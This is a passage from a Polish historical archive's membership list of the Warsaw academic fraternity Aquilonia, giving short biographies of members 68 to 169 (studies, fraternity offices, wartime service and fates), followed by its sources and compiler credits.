 68. Konstanty Komierowski, (1894 - 1939) absolwent Gimnazjum Wojciecha Górskiego w Warszawie 1912/13, student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), założyciel i pierwszy skarbnik Aquilonii 1915, sekretarz 1915/16, żołnierz I Korpusu Polskiego gen. Józefa Dowbor-Muśnickiego, ziemianin, w II RP działacz katolicki, społeczny i polityczny, członek Stronnictwa Zachowawczego, pierwszy skarbnik Związku Filistrów Aquilonii 1926-28, oficer rez., poległ w wojnie obronnej 1939
 69. Zbigniew Komorowski, (1916 - ) student prawa UW
 70. Stanisław Koprowski, (1911-1985) student farmacji UW, c. 1931 w Sparcie, akt. 1931-33, członek Prezydium (skarbnik ?) sem. zim. 1933/34, wystąpił przed 1937, później w Aquilonii
 71. Jerzy Kornecki, (1905-1967) student prawa UW, c. 1924, akt. 1924-29, prawnik, adwokat, żeglarz
 72. Tadeusz Kosiewicz, (1908-1980) student Wydziału Mechanicznego PW, c. 1930, akt. 1930-32
 73. Tadeusz Koskowski, (1906?-1964) student rolnictwa SGGW, c. 1928, akt. 1928-33
 74. Tadeusz Anatol Koss, (1909 - 29 luty 1980) student prawa UW, c. 1929, akt. 1929-33, oficer rez., uczestnik wojny obronnej 1939, żołnierz AK, prawnik, adwokat, pochowany na warszawskich Powązkach
 75. Stefan Kossakowski, (1899 - ) student prawa UW, założyciel i pierwszy wiceprezes 1921
 76. Wacław Kossowski, (1891 - ) student Kursów Przemysłowo-Rolniczych, c. 1915
 77. Adam Kowalski, (1902 - ) student Wydziału Mechanicznego PW, c. 1924, akt. 1924-28, wiceprezes sem. zim. 1924/25
 78. Stanisław Kowalski, student Kursów Przemysłowo-Rolniczych, c. 1915
 79. Piotr Kozerski,
 80. Jan Kozłowski, student inżynierii lądowej PW, c. 1924, akt. 1924-31
 81. Zbigniew Krasnodębski, (1911-1991) student PW, c. 1930, akt. 1930-33, wiceprezes sem. let. 1932/33, architekt, kpt. żeglugi
 82. Janusz Kraszewski, (1894 - 1963) student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915
 83. Antoni Krzyżanowski, student Kursów Przemysłowo-Rolniczych, c. 1915
 84. Eugeniusz Kubicki, (1910 - ) student UW, c. 1930, akt. 1930-32, skreślony
 85. Ludwik Maurycy Kugler, (1894-1939) brat stryjeczny Tadeusza (Jagiellonia), student i absolwent Kursów Przemysłowo-Rolniczych (SGGW), założyciel Aquilonii 1915, ochotnik w I Korpusie Polskim gen. Józefa Dowbor-Muśnickiego w 3 Pułku Ułanów Krechowieckich, członek Związku Ziemian, ppor. rez., aresztowany we wrześniu we własnym maj. Styrzyniec przez bojówkę komunistyczną został przez nią wraz z żoną zamordowany
 86. Jan Kułakowski, (1903 - ) student UW i Akademii Handlowej, c. 1924, akt. 1924-26
 87. Jan Kuszewski, (1909 - ) student PW, c. 1927/28, akt. 1927/28-33
 88. Tadeusz Kwiatkowski, student Kursów Przemysłowo-Rolniczych, c. 1915
 89. Tadeusz Latoszyński, (1903 - 15 września 1931) student prawa UW, c. 1924, akt. 1924-31
 90. Jan Lesicz (Lesisz), (1900-1990) student prawa UW, c. 1924, akt. 1924-25
 91. Janusz Lipnicki, (1913-1990) student weterynarii UW
 92. Kazimierz Lipnicki, student UW, c. 1931, akt. 1931-33, sekretarz sem. let. 1932/33
 93. Stefan Łochtin, (24 marca 1911 w Rypinie - 26 listopada 1962 w Londynie) student PW, od 1931 student UW, od 1933 USB, c. 1931, akt. 1931-33, działacz OWP i MW, od 1935 prezes Koła Wileńskiego MW, więziony w obozie w Berezie Kartuskiej, dziennikarz, ppor. rez. art., żołnierz w wojnie obronnej 1939, uczestnik kampanii francuskiej 1940, internowany w Szwajcarii, absolwent prawa Uniwersytetu we Fryburgu 1943, po wojnie na emigracji w Londynie, dziennikarz, wiceprezes Związku Dziennikarzy RP w Londynie, autor książek: “Metody sowietyzacji w krajach Europy środkowo-wschodniej” (1943), “Sąsiad naszego niebezpiecznego sąsiada. Sowiety a Chiny 1945-54″ (1954), “The Sowiet Conquest in Central and Eastern Europe” (1954), pochowany na North Sheen Cemetery w Londynie
 94. Witold Łyżwiński, (1909-1945) absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1926, student i absolwent 1930 prawa UW, dr prawa 1933, c. 1927/28, akt. 1927/28-31, sekretarz sem. zim. 1929/30, działacz narodowy, sekretarz Młodzieży Wszechpolskiej 1928, członek ONR i Związku Polskiego, ppor. rez., w czasie okupacji w NSZ ps. “Maciejewski”, dowódca 1 Kompanii Batalionu “Gozdawa” w Powstaniu Warszawskim, awansowany do stopnia kapitana, jeniec oflagu w Murnau, po oswobodzeniu wyjechał do Włoch, gdzie zginął w nieznanych okolicznościach
 95. Tadeusz Majewski, (1899 - 1960) student prawa UW, akt. 1924-25, założyciel i pierwszy sekretarz 1921
 96. Jan Mamrot,
 97. Leonard Malej, (14 czerwca 1916 w Sankt Petersburgu - 31 lipca 1944 w Mińsku Mazowieckim) student i absolwent 1939 farmacji UW, w czasie II wojny światowej pracował w aptece St. Pfada w Mińsku Mazowieckim, zginął od bomby lotniczej podczas ofensywy radzieckiej
 98. Jan Mamrot,

  Andrzej Marchwiński, 1926 r.

 99. Andrzej Marchwiński, (1905-1946) prawd. s. Władysława (Aquilonia) i Łucji z d. Lauber, absolwent Gimnazjum św. Kazimierza w Warszawie, ochotnik w wojnie polsko-rosyjskiej 1920, student i absolwent prawa UW, akt. 1924-26, dwukrotny prezes, olderman sem. let. 1924/25, wiceprezes Młodzieży Wszechpolskiej, redaktor “Korporanta”, dr prawa, po studiach praownik MSZ, w czasie okupacji jeden z kierowników sekcji spraw zagranicznych w Delegaturze Rządu na Kraj oraz jednocześnie w strukturach cywilnych ZJ-NSZ

 100. Jerzy Marcinkowski, (1912 - ) student Wydziału Matematyczno-Przyrodniczego UW, c. 1932, akt. 1932-33
 101. Mieczysław Matejak, (1901 - 1978) student WSH, c. 1924/25, akt. 1924/25-29
 102. Włodzimierz Merz (Merc), (1914-1974) student Wydziału Mechanicznego PW
 103. Janusz Mikulski, (1906 - ) student Wydziału Humanistycznego UW oraz Uniwersytetu w Grenoble, c. 1927/28, akt. 1927/28-32
 104. Władysław Mikułowski, (1903-1985) student SNP oraz prawa UW, akt. 1927-29, prawnik, adwokat
 105. Robert Milbradt, (1902 w miejsc. Cierpisz w pow. konińskim - 28 kwietnia 1945) absolwent Gimnazjum Matematyczno-Przyrodniczego w Gnieźnie 1923, student i absolwent 1926 WSH, c. 1925/26, akt. 1925/26-28, po studiach pracownik Banku Polskiego w Warszawie, ppor. rez., zmarł w nieznanych okolicznościach
 106. Mieczysław Mitkiewicz, (1907 - ) student prawa UW, od 1929 student WSH, c. 1927/28, akt. 1927/28-32
 107. Jan Mokrzycki, (1911 - 16 sierpnia 1943 w Warszawie) absolwent Gimnazjum im. Mikołaja Reja w Warszawie 1927, student i absolwent 1939 stomatologii Wydział Medyczny UW, c. 1929/30, akt. 1929/30, wystąpił z korporacji, członek Zarządu Bratniej Pomocy Studentów UW 1929, działacz OWP, po studiach lekarz-stomatolog w Warszawie, podczas okupacji w ZWZ-AK, aresztowany przez Gestapo i więziony na Pawiaku, rozstrzelany wraz z ojcem i bratem w ruinach getta
 108. Antoni Jerzy Motz, (23 lutego 1904 w Warszawie - 17 września 1940 w Palmirach) s. Antoniego i Zofii z Kiedrzyńskich, absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1921, w wojnie polsko-rosyjskiej 1920 w 9 Dywizjonie Artylerii Konnej, student i absolwent med. 1927 UW, c. 1923, akt. 1923-26, po studiach adiunkt w szpitalu Dzieciątka Jezus oraz pracownik Pogotowia Ratunkowego, w latach 30-tych współwłaściciel kliniki lekarskiej “5555″, w czasie okupacji pracował w II Oddziale Chirurgicznym Szpitala Dzieciątka Jezus w Warszawie, organizator służby zdrowia ZWZ, w ramach tajnego UW prowadził nauczanie w zakresie nauk medycznych, aresztowany przez Gestapo za ukrywanie i leczenie rannego oficera, rozstrzelany w zbiorowej egzekucji w Palmirach
 109. Czesław Muszyński, (1903 - 7 kwietnia 1980) student WSH, c. 1927/28, akt. 1927/28-33, olderman sem. let. 1929/30, współwłaściciel firmy “Francpol”, po wojnie dyrektor “Orbisu” i “Sport-Touristu”, odznaczony Krzyżem Kawalerskim OOP
 110. Michał Nałęcz-Dobrowolski, (1907 - 25 września 1944 w Dachau) student i absolwent architektury PW, c. 1925/26, akt. 1925/26-33, sekretarz sem. let. 1927/28, olderman 1928/29, w czasie okupacji organizator łączności Komendy Głównej ZWZ z Naczelnym Dowództwem PSZ na Zachodzie, po Powstaniu Warszawskim wywieziony do Auschwitz, następnie w obozach koncentracyjnych w Natzweiler i Dachau
 111. Stanisław Niesłuchowski, (1907-1998) student prawa UW, c. 1929, akt. 1929-33
 112. Henryk Nowakowski, (1910 - ) student med. UW, c. 1932/32, akt. 1932/33, lekarz wojskowy
 113. Adam Olszewski, (1906-1977) student prawa UW, c. 1924, akt. 1924-28, prezes 1925/26, II wiceprezes sem. let. 1927/28, naczelnik Wydziału Cywilnego Prokuratorii Generalnej RP, adwokat, długoletni sekretarz prawniczy Naczelnej Rady Adwokackiej
 114. Tadeusz Olszewski, (1900? - ). c. 1924, akt. 1924-25

  Michał Ossowski, 1926 r.

 115. Michał Ossowski, (1904-1927) s. Walerego i Julii Łuczyńskiej, student med. UW, c. 1924, akt. 1924-26, sekretarz Warszawskiego Komitetu Akademickiego 1925-27, pochowany w grobie rodzinnym na Starych Powązkach (kw. 237)

  Andrzej hr. Rawita-Ostrowski.

 116. Andrzej hr. Rawita-Ostrowski, (30 listopada 1892 w miejsc. Krasna - 25 września 1953 w Paryżu) s. Władysława i Tadei z Bogusławskich, student Kursów Przemysłowo-Rolniczych, inż. Rolnik, założyciel i pierwszy wiceprezes Aquilonii 1915, pierwszy prezes Związku Filistrów Aquilonii 1926, ppor. 3 Pułu Ułanów, przewodniczący Koła Polskiego Związku Inwalidów Wojennych, konsul w Paryżu, pochowany w na warszawskich Powązkach (kw. 7, rz. 7, m. 1.2)

 117. Leon Ostrowski, (1908 - 29 maja 1980) absolwent Gimnazjum im. Jana Zamoyskiego, student med. UW, c. 1929, akt. 1929-33, lekarz chirurg, dr med., długoletni adiunkt Szpitala Dzieciątka Jezus, oficer w wojnie obronnej 1939, w konspiracji w AK, lekarz Szpitala Maltańskiego, odznaczony Krzyżem Powstańczym
 118. Zdzisław Ostrowski, (1903 - 5 grudnia 1932 w Warszawie) s. Leonarda i Walerii z d. Lorkiewicz, absolwent Gimnazjum im. Jana Zamoyskiego 1922, student WSH, student i absolwent Akademii Handlowej w Antwerpii, c. 1924, akt. 1924-26, po studiach pracownik firmy “Franciszek Fuchs i Synowie”, pochowany w grobie rodzinnym na Starych Powązkach (kw. 40)
 119. Eugeniusz Pac, (1915 - ) student farmacji UW

  Mieczysław Pączkowski, 1928 r.

 120. Mieczysław Jerzy Pączkowski, (4 maja 1904 we Włodzisławiu na ziemi kieleckiej - 15 sierpnia 1977 w Warszawie) s. Józefa i Bronisławy z d. Mirewicz, w wojnie polsko-rosyjskiej 1920 w 33 Pułku Piechoty, absolwent Gimnazjum Kulwiecia w Warszawie 1924, student i absolwent 1929 prawa UW, c. 1925, akt. 1925-29, prezes sem. let. 1927/28, prezes Warszawskiego Koła Międzykorporacyjnego sem. let. 1927/28, prezes ZPKA 1928-30 (VIII kadencja) oraz 1930 (IX kadencja), odznaczony Dyplomem Zasługi i Złotej Odznaki ZPKA działacz narodowy OWP i ONR, adwokat, pracownik magistratu m.st. Warszawy, radny m.st. Warszawy 1938-39, w konspiracji w zapleczu cywilnym NSZ, kpt. ps. “Turski” w Powstaniu Warszawskim, po kapitulacji w obozie koncentracyjnym w Bergen Belsen, po wojnie na emigracji we Francji, wrócił do kraju, pracował jako adwokat w Warszawie

 121. Leszek (Leon Witold) Piechowski , (1905-1944) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1924, student prawa UW, c. 1924, akt. 1924-32, sekretarz 1927, członek Centralnego Zarządu Kół Naukowych 1925-27, sekretarz Koła Warszawskiego MW, działacz ONR, poległ w Powstaniu Warszawskim
 122. Witold Piędzicki, (1893 - 1968) student Kursów Przemysłowo-Rolniczych, założyciel i pierwszy sekretarz Aquilonii 1915
 123. Henryk Pilitowski, (14 lipca 1911 - 8 maja 1986) student prawa UW, c. 1930, akt. 1930-35, sekretarz ZPKA 1933-35 (XIII kadencja), ppor. AK, uczestnik Powstania Warszawskiego w Dowództwie III Rejonu, długoletni pracownik WHZ “Agpol”, odznaczony Srebrnym Krzyżem Zasługi z Mieczami, pochowany na Cmentarzu Powązkowskim w Warszawie
 124. Tadeusz Plebański, (1893 - 1968) student Kursów Przemysłowo-Rolniczych, c. 1915

  Olgierd Podwysocki, 1930/31 r.

 125. Olgierd Podwysocki, (1909-1934) student Wydziału Humanistycznego UW, c. 1928, akt. 1928-32, olderman sem. zim. 1931/32, prezes sem. zim. 1932/3, sekretarz wewnętrzny ZPKA 1930-31 (X kadencja), polonista

 126. Leonard Popławski, (1907-1970) student UW, od 1930 student WSH, c. 1928, akt. 1928-33, sekretarz sem. let. 1930/31
 127. Tadeusz Raszewski, (1905 - ) student prawa UW, c. 1924, akt. 1924-33
 128. Wojciech Rogoziński, (1910 [09?] - po 1979) student PW, student UW, od 1932 student WSH, c. 1929/30, akt. 1929/30-33, po wojnie na emigracji w Wenezueli
 129. Adam Rontaler, (1909 - 1987) student WSH, c. 1932 akt. 1932-33, po wojnie na emigracji w Wielkiej Brytanii
 130. Kazimierz Rossman, (1893 - 1944?) student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915
 131. Jan Rostkowski, (1916-1984) student farmacji UW oraz WSH
 132. Henryk Różycki, (1904-1964) student WSH, akt. 1924-32
 133. Jerzy Rudziński, (1905-1982) student prawa UW, c. 1924/25, akt. 1924/25-31, wiceprezes sem. let. 1928/29, sędzia wojskowy, pochowany na warszawskich Powązkach
 134. Władysław Ryng, (1913 - 5 grudnia 2005) c. 1932, absolwent SGH, członek Komisji Rewizyjnej Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993-95, członek Zarządu Stowarzyszenia Filistrów Korporacji Akademickich 1995-97
 135. Bronisław Saski, (1895-1941) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1914, student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915, ppor. rez. ułanów, zamordowany w obozie koncentracyjnym
 136. Witold Sienicki, (1906-1985) student prawa UW, c. 1925/26, akt. 1925/26-29, wiceprezes sem. let. 1927/28, prezes sem. let. 1928/29, wiceprezes Warszawskiego Koła Międzykorporacyjnego sem. let. 1927/28, prawnik, adwokat
 137. Bronisław Sosnowski, (1897-1969) student prawa UW, akt. 1924-26, prawnik
 138. Stanisław Sosnowski, (1899-1944) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1918, student i absolwent architektury PW, akt. 1924-31, autor projektu herbu korporacji, dwukrotny olderman 1922-23 i wiceprezes 1923/24; w czasie okupacji działacz ZWZ i AK, rozstrzelany jesienią przez Niemców
 139. Mieczysław Stachowiak, (1908 - ) student Wydziału Mechanicznego PW, c. 1930/31, akt. 1930/31-33
 140. Stefan Suchowiak (po wojnie Stankiewicz), (1909 - 1995 w Świnoujściu) s. Wacława (prof.. PL i PW), ukończył VII Kursu podchorążych rezerwy artylerii w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1932/33, w stopniu plutonowego podchorążego odbył w lecie 1933 praktykę w 7 Dywizjonie Artylerii Kawalerii w Poznaniu, student i absolwent Wydziału Mechanicznego PW, c. 1932 akt. 1932-33, w wojnie obronnej 1939 ppor. rez. artylerii, od wiosny 1940 żołnierz ZWZ-AK, dowódca plutonu w Obwodzie IV Ochota, a następnie zastępca oficera broni Obwodu, aresztowany 1943 w związku z przechowywaniem zbiegłych angielskich jeńców woejnnych, odbity w “Akcji pod Aresnałem” 26 marca 1943, później ukrywał się w Warszawie oraz w maj. Chlewnia pod Grodziskiem, od końca 1943 w oddziale partyzanckim AK na Lubelszczyźnie, gdzie walczył pod ps. “Odwet”, po wojnie zmienił nazwisko na “Stankiewicz, pochowany w Świnoujściu

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 141. Zdzisław Starowicz, (1894-1951) student architektury PW, akt. 1921-25, założyciel i pierwszy prezes Aquilonii 1921
 142. Witold (Wiesław) Stefański, (1915 - ) student farmacji UW
 143. Władysław Stolzenwald, ( - 1941) student Kursów Przemysłowo-Rolniczych, założyciel Aquilonii 1915
 144. Marian Strumiłło, (1903 - ) student WSH, c. 1924, akt. 1924-29
 145. Janusz Stypułkowski, (25 lipca 1907 - 18 września 1939) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1925, student i absolwent 1932 rolnictwa SGGW, c. 1925/26, akt. 1925/26-31, sekretarz sem. let. 1927/28, wiceprezes 1928/29, olderman sem. let. 1928/29, olderman sem. zim. 1929/30, sekretarz Warszawskiego Koła Międzykorporacyjnego sem. let. 1927/28, ppor. rez., poległ w obronie twierdzy w Modlinie
 146. Wiesław Jan Stypułkowski, (9 listopada 1908 - 23 czerwca 1979) student i absolwent Wydziału Mechanicznego PW, c. 1927/28, akt. 1927/28-33, sekretarz sem. let. 1929/30, prezes sem. zim. oraz sem. let. 1930/31, wieloletni pracownik przemysłu motoryzacyjnego, pochowany w grobie rodzinnym na warszawskich Powązkach, odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym i Srebrnym Krzyżem Zasługi

  Zbigniew Stypułkowski, 1925 r.

 147. Zbigniew Stypułkowski, (1904 w Warszawie - 30 marca 1979 w Londynie) ochotnik w wojnie polsko-rosyjskiej 1920, student i absolwent prawa UW 1921-25, akt. 1923-25, olderman sem. zim. 1924/25, prezes, sekretarz wewn. ZPKA 1923-24 (II kadencja), pierwszy wiceprezes 1926, a w latach 30-tych prezes Związku Filistrów Aquilonii, wiceprezes oraz p.o. prezesa Naczelnego Komitetu Akademickiego 1925-27, adwokat, działacz Młodzieży Wszechpolskiej i Stronnictwa Narodowego, poseł na Sejm RP 1930-35, ochotnik w wojnie obronnej 1939, w niewoli rosyjskiej i niemieckiej w stalagach IVb Mühlberg, VIIb w Moosburgu, zwolniony 1940, działacz politycznej konspiracji, jeden z 16 uwięzionych i sądzonych w Moskwie przez Rosjan przywódców Państwa Podziemnego, po wojnie na emigracji w Wielkiej Brytanii i Stanach Zjednoczonych, po zwolnieniu uciekł na Zachód, działacz Stronnictwa Narodowego na uchodźstwie, autor wspomnień “W zawierusze dziejowej” (1951, wyd. II rozszerzone “Zaproszenie do Moskwy”), pochowany na Cmentarzu Gunnersbury w Londynie

 148. Wiktor Sudra, (23 grudnia 1907 - 4 lutego 1987) student Wydziału Mechanicznego PW, c. 1930/31, akt. 1930/31-33, prof. PW
 149. Jerzy Suwald, (1904 - ) student UW i SNP, c. 1925/26, akt. 1925/26-33, prawnik
 150. Witold Szczepkowski, (1899 - 1942 w Warszawie) absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1917, student i absolwent 1931 inżynierii wodnej PW, akt. 1922-31, prezes 1922, 1922/23 oraz 1923, olderman 1923/24, działacz OWP, publicysta z zakresu techniki sanitarnej, zmarł w czasie okupacji jako ofiara wojny
 151. Antoni Szperlich, (1908-1954) absolwent Gimnazjum im. Św. Stanisława Kostki w Warszawie 1926, student prawa UW, c. 1927/28, akt. 1927/28-33, wiceprezes sem. zim. 1931/32, prezes sem. let. 1932/33, 1933/34, 1934/35, skreślony, prezes Sądu Ogólnoakademickiego 1932/33 i 1933/34, aktywny działacz ONR, red. odpowiedzialny pisma “Podbipięta”, współredaktor “Nowego Ładu” i “ABC”, w czasie okupacji członek Komitetu Politycznego tajnej Organizacji Polskiej ZJ-NSZ, w organizacji od 1942 szef wydziału antykomunistycznego, po wojnie więziony i torturowany przez UB, zwolniony ze względu na stan zdrowia w tydzień po opuszczenia więzienia
 152. Janusz Szweykowski, (1912 - 1964) student prawa UW, c. 1932 akt. 1932-33
 153. Ludwik Ślusarski, (1910-1999) student WSH, c. 1930, akt. 1930-31, wystąpił

  Jerzy Thieme, 1931/32 r.

 154. Jerzy Thieme, (1910-1987) student Wydziału Mechanicznego PW, c. 1929/30, akt. 1929/30-32, wiceprezes sem. zim. 1932/33, sekretarz wewn. ZPKA 1931-32 (XI kadencja), prof. Politechniki Warszawskiej

 155. Jan Trószyński, (1903 - 6 września 1939 pod miejsc. Longinówka k. Piotrkowa) uczeń Gimnazjum w Humaniu 1912-18, więzień bolszewicki w Winnicy, zwolniony po pokoju w Rydze 1921, absolwent Gimnazjum Kazimierza Kulwiecia w Warszawie 1927, student Wydziału Matematyczno-Filozoficznego UW 1927/28, od 1928 WSH, c. 1927, akt. 1927-30, wiceprezes sem. zim. 1929/30, prezes Koła Ekonomistów i Sądu Koleżeńskiego WSH 1929/30, por. rez. piechoty, w wojnie obronnej 1939 oficer informacyjny 76 Lidzkiego Pułku Piechoty 29 Dywizji Piechoty, poległ
 156. Bronisław Tryniszewski, (1909-1987) student Wydziału Mechanicznego PW, c. 1929/30, akt. 1929/30-32, sekretarz sem. zim. 1932/33, po wojnie na emigracji w Brazylii
 157. Jerzy Jan Trzciński, (19 grudnia 1913 w Ostrowie w Rosji - ) student i absolwent 1940 farmacji UW
 158. Zenon Urbankiewicz, brat Jerzego (Patria), student Wydziału Mechanicznego PW
 159. Wojciech Wasiutyński, (8 września 1910 w Warszawie - 19 sierpnia 1994 w Rye w Stanach Zjednoczonych) s. Bohdana (Baltia) brat Wacława i Witolda (Sarmatia) student i absolwent prawa UW, c. 1928, akt. 1928-32, wiceprezes sem. zim. oraz sem. let. 1930/31, dr praw, dziennikarz, publicysta katolicko-narodowy i historyk, po wojnie na emigracji w Stanach Zjednoczonych
 160. Marian Woyniłłowicz, (1905 - ) student Wydziału Humanistycznego UW, c. 1925/26, akt. 1925/26-31, olderman sem. let. 1927/28, olderman sem. let. 1930/31
 161. Marian Wyszyński, (1902 - 16 sierpnia 1943 w Warszawie) s. Edmunda i Franciszki Stec, brat Stefana (Aquilonia), absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1920/21, student i absolwent prawa UW, c. 1924, akt. 1924-30, sekretarz sem. let. 1924/25, wiceprezes 1925/26, sekretarz Sądu Ogólnokorporacyjnego 1925/26, działacz OWP i ONR, w konspiracji w AK, aresztowany przez Gestapo i osadzony na Pawiaku, następnie rozstrzelany wraz z bratem Stefanem w ruinach getta
 162. Stefan Wyszyński, (5 sierpnia 1911 - 16 sierpnia 1943 w Warszawie) s. Edmunda i Franciszki z d. Stec, brat Mariana (Aquilonia), absolwent Gimnazjum im. Św. Stanisława Kostki w Warszawie 1931, harcerz, student i absolwent med. UW 1939, c. 1932, akt. 1932-33, członek Sądu Koleżeńskiego Koła Medyków Studentów UW 1936/37, po studiach lekarz w I Klinice Chorób Wewnętrznych UW i w Szpitalu Dzieciątka Jezus w Warszawie, w czasie okupacji prowadził w Warszawie tajne nauczanie w zakresie nauk medycznych, organizator ośrodka służby zdrowia AK, aresztowany przez Gestapo i osadzony na Pawiaku, następnie rozstrzelany wraz z bratem Marianem w ruinach getta
 163. Wacław Wyszyński, (1911 - 31 marca 1996 w Warszawie) student i absolwent WSH, c. 1929, akt. 1929-33, sekretarz sem. zim. 1931/32
 164. Witold Zapolya-Zapolski, student Kursów Przemysłowo-Rolniczych, c. 1915
 165. Roman Zieliński,
 166. Seweryn Marcin Bonar Zieliński, (1 listopada 1902 w Bonarowie w pow. skierniewickim - ) student i absolwent med. 1932 UW, c. 1924, akt. 1924-29, lekarz-bakteriolog

  Zbigniew Bonar Zieliński, 1928 r.

 167. Zbigniew Bonar Zieliński, (1904 - 1941 w Auschwitz) absolwent Gimnazjum im. Jana Zamoyskiego w Warszawie 1922/23, student prawa UW, c. 1924, akt. 1924-30, wiceprezes 1927/28, por. rez. kawalerii, żołnierz wojny obronnej 1939, żołnierz ZWZ i AK, aresztowany przez Gestapo w Warszawie, zesłany do obozu koncentracyjnego w Auschwitz i tam zamordowany

 168. Juliusz Znamierowski, (1912-1998) student WSH
 169. Kazimierz Żółtowski, (1905 - 1970) student i absolwent prawa UW, c. 1924, akt. 1924-29, żołnierz AK, działacz we władzach “Uprawy”, członek Delegatury Rządu na kraj

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) biogramów ze strony: www.aquilonia.waw.pl, 2009-2010 (autorstwa Daniela Patera i Krzysztofa Adama Tyszki),
3) Omnia pro Patria. Biuletyn Polskiej Korporacji Akademickiej Aquilonia, 2005,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Aquilonia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 8 IX 2010 r.
Ostatnia zmiana: 30 XI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Aquilonia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 30 XI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }